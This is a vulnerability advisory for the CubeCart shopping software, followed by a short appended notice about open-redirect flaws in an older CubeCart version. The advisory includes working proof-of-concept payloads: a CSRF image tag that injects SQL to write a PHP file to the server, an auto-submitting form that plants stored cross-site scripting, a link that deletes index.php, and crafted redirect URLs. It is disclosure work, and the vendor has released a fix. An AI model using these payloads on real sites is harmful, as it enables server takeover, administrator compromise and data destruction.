CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users.
1) SQL Injection in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied data passed via "char" HTTP GET parameter to "/admin.php" PHP script. A remote authenticated attacker with privileges to view list of products can alter present SQL query, inject and execute arbitrary SQL commands in the application's database. This vulnerability can be also exploited by anonymous attacker via CSRF vector.
A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has writing permissions to this directory), which can execute phpinfo() function:
<img src="http://[host]/admin.php?_g=products&cat_id=1&sort[updated]=DESC&cha
r=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUT
FILE%20'/var/www/site/file.php'%20--%202">
2) Stored Cross-Site Scripting in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default.
Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator just visits "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against.
To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile:
<form action="http://[host]/index.php?_a=profile" method="POST" name="f1">
<input type="hidden" name="title" value="title" />
<input type="hidden" name="first_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="last_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="email" value="mail (at) mail (dot) com [email concealed]" />
<input type="hidden" name="phone" value="1234567" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="passold" value="" />
<input type="hidden" name="passnew" value="" />
<input type="hidden" name="passconf" value="" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Submit request" />
</form><script>document.f1.submit();</script>
A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page:
http://[host]/admin.php?_g=customers
3) Cross-Site Request Forgery in CubeCart
The vulnerability exists due to insufficient validation of HTTP request origin, when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and delete arbitrary file on the system.
A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below:
http://[host]/admin.php?_g=maintenance&node=index&delete=../index.php
------------------------------------------------------------------------
-----------------------
Solution:
Update to CubeCart 6.0.11
More Information:
https://forums.cubecart.com/topic/51079-cubecart-6011-released/
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
source: https://www.securityfocus.com/bid/51966/info
CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
CubeCart 3.0.20 is vulnerable; other versions may also be affected.
http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D
http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D